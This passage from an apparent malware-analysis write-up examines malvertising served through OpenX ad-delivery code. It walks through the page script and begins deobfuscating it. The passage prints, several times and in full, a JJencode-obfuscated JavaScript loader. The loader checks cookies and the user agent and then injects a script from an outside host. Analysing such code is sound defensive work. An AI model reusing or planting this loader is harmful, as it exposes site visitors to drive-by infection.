A little bit of OSINT sheds more light on the nature of the code above: OpenX is apparently an advertising company that "provides digital and advertising technologies that optimize a company's advertising revenue." The library itself is SWFObject (note the org.openx.SWFObject namespace, and the SWFObject/FlashObject aliases a little further down), which, according to Wikipedia, "is an open-source JavaScript library used to embed Adobe Flash content onto Web pages.... The library can also detect the installed Adobe Flash Player plug-in in all major web browsers, on all major operating systems (OS), and can redirect the visitor to another webpage or show alternate HTML content if the installed plug-in is not suitable." That matches up pretty well to what we've seen so far: this looks like OpenX's ad-delivery code carrying its own namespaced copy of SWFObject.
The code that follows gets a bit more interesting. We have a few variable declarations:
// Short aliases used by the ad markup built below; FlashObject and
// SWFObject both name the same org.openx.SWFObject constructor.
var SWFObject = org.openx.SWFObject;
var FlashObject = SWFObject;
var getQueryParamValue = org.openx.util.getRequestParameter;
// Flag set on the document; nothing in the visible code reads it back.
document.mmm_fo = 1;
// Accumulates the HTML/script fragments that document.write() emits at the end.
var OX_0f4f918e = '';
Then we have this big ugly block of unintelligible code:
OX_0f4f918e += "<" + "script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+
$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<" + 
"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><" + "/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<" + "/script><" + "!--ffnqt-->\n";
Interestingly, we see that exact same block of code repeated three times with only slight variations in the enclosing HTML tags. The first one above simply puts javascript in a <script> tag. The second encloses it in a <div> tag with an id attribute in addition to the <script> tag. The third instance goes back to using just a <script> tag, but prepends it with a linked image:
<a href='http://ad.same-story.com/delivery/ck.php?oaparams=2__bannerid=155__zoneid=9__cb=956c2f8948__oadest=http%3A%2F%2Fhome.edt02.net%2Femc%2Fbanner%2Fmstbc.php%3Fc%3D40060-195305-99922-0-335287' target='_blank'><img src='http://ad.same-story.com/images/9b4c7c85bcd76a4593020663b97f5dec.gif' width='300' height='250' alt='' title='' border='0' /></a>
This looks a lot like a banner ad, and a quick check of the domains against VirusTotal confirms that suspicion:
That second one should raise an eyebrow since "adult content" combined with "ads" can often lead to malicious content injection. We still haven't found anything outright malicious, though, so let's continue on.
Next we see the same block of unintelligible code repeated yet again, followed by this:
OX_0f4f918e += "<" + "script type=\'text/javascript\'><" + "!--// <" + "![CDATA[\n";
OX_0f4f918e += "var ox_swf = new FlashObject(\'http://ad.same-story.com/images/abcf302d1728cb4ec9ebbc5360497402.swf\', \'Advertisement\', \'300\', \'250\', \'9\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fad.same-story.com%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D155__zoneid%3D9__cb%3D956c2f8948__oadest%3Dhttp%253A%252F%252Fhome.edt02.net%252Femc%252Fbanner%252Fmstbc.php%253Fc%253D40060-195305-99922-0-335287\');\n";
OX_0f4f918e += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_0f4f918e += "ox_swf.write(\'ox_64ea63b5f76eb3c481ad44a961e2c479\');\n";
OX_0f4f918e += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div>\"); } else { document.write(\"<" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div>\"); }\n";
It looks like the banner ad's click-through link is now being attached to the Flash object itself via the clickTAG flashvar, and the movie is embedded with allowScriptAccess set to always, which permits the SWF to call JavaScript in the hosting page – worth remembering when the creative is served from a third-party ad host. ox_swf.write() injects the markup into the element with id ox_64ea63b5f76eb3c481ad44a961e2c479, and a hidden zero-size image then requests lg.php, an impression-logging beacon (with fb=1 when the installed Flash version was not good enough). The same beacon is repeated in a <noscript> block for visitors who have JavaScript disabled:
OX_0f4f918e += "// ]]> --><" + "/script><" + "noscript><" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div><" + "/noscript>
...and then one more copy of the unintelligible code. Finally, the last line prints all of the above to the browser page:
document.write(OX_0f4f918e);
What have we learned so far? Not much, really, except that somebody really wants that unintelligible code block to execute. So much so that they thought it would be a good idea to print it to the page four times! I admit I don't understand why they chose this particular tactic, but each copy is wrapped in try { } catch (e) { }, so a failure in one copy neither breaks the page nor surfaces an error, and repeating it simply gives the script multiple chances to execute successfully. Now let's see if we can't figure out what it's actually trying to do.
Step 3: Deobfuscation
Here we finally get to the fun part: deobfuscating the unintelligible code. Let's isolate the block of code we care about:
try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"
+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<" + 
"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><" + "/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}
Since that block of code was assigned to a variable as a string, the double quotes, single quotes and backslashes inside it are escaped and need to be unescaped. If you do this by hand, order of operations matters: unescape the backslashes first, then each set of quotes. The less error-prone route is to let a JavaScript engine do it – evaluate the string literal in a sandbox (or a console with no network) and print the result, which is exactly what the browser would have done. Either way the result is a bit cleaner:
try{$a=~[];$a={___:++$a,$$$$:(![]+"")[$a],__$:++$a,$_$_:(![]+"")[$a],_$_:++$a,$_$$:({}+"")[$a],$$_$:($a[$a]+"")[$a],_$$:++$a,$$$_:(!""+"")[$a],$__:++$a,$_$:++$a,$$__:({}+"")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+"")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+"")[$a.__$])+((!$a)+"")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!""+"")[$a.__$])+($a._=(!""+"")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!""+"")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+"\""+$a.$$_$+"="+$a.$$_$+$a._$+$a.$$__+$a._+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";"+$a._+$a.$_$_+"=\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a.$$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"."+$a._+"\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.___+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+"("+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"==="+$a._+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('_"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"=')==-"+$a.__$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a._$_+$a.$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+"\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a.$$_+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.$__+$a.___+"')>"+$a.___+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.
__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a.__$+$a.$_$+"\\"+$a.__$+$a._$_+$a._$$+"\\"+$a.__$+$a.__$+$a.__$+"\\"+$a.__$+$a.___+$a.$_$+"\\"+$a.$__+$a.___+"')>"+$a.___+")\\"+$a.$__+$a.___+"{"+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"="+$a.__$+";"+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+"='__"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"="+$a.__$+";\\"+$a.$__+$a.___+$a.$$$_+"\\"+$a.__$+$a.$$$+$a.___+"\\"+$a.__$+$a.$$_+$a.___+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$$+"=\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+",\\"+$a.$__+$a.___+$a.___+$a.__$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+"\\"+$a.$__+$a.___+$a.___+$a.___+":"+$a.___+$a.___+":"+$a.___+$a.___+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a._$_+$a.$_$+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.__$+$a.___+$a._$$+";\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+"\\"+$a.__$+$a.$_$+$a.___+"=/';"+$a.$$_$+".\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+"")[$a._$_]+"\\"+$a.__$+$a.$_$+$a.$$_+"(\\\"<" + 
"\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\\"+\\\"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a.___+$a.__+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"='\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+"\\"+$a.__$+$a.$$_+$a.___+"://"+$a.$_$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.__$+$a.$$_+$a._$$+"."+$a.$_$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$$+$a._$_+"/"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+".\\"+$a.__$+$a.$_$+$a._$_+"\\"+$a.__$+$a.$$_+$a._$$+"?"+$a.$$__+"\\"+$a.__$+$a.$$_+$a.___+"="+$a.$_$_+$a.$$_$+".\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"-\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.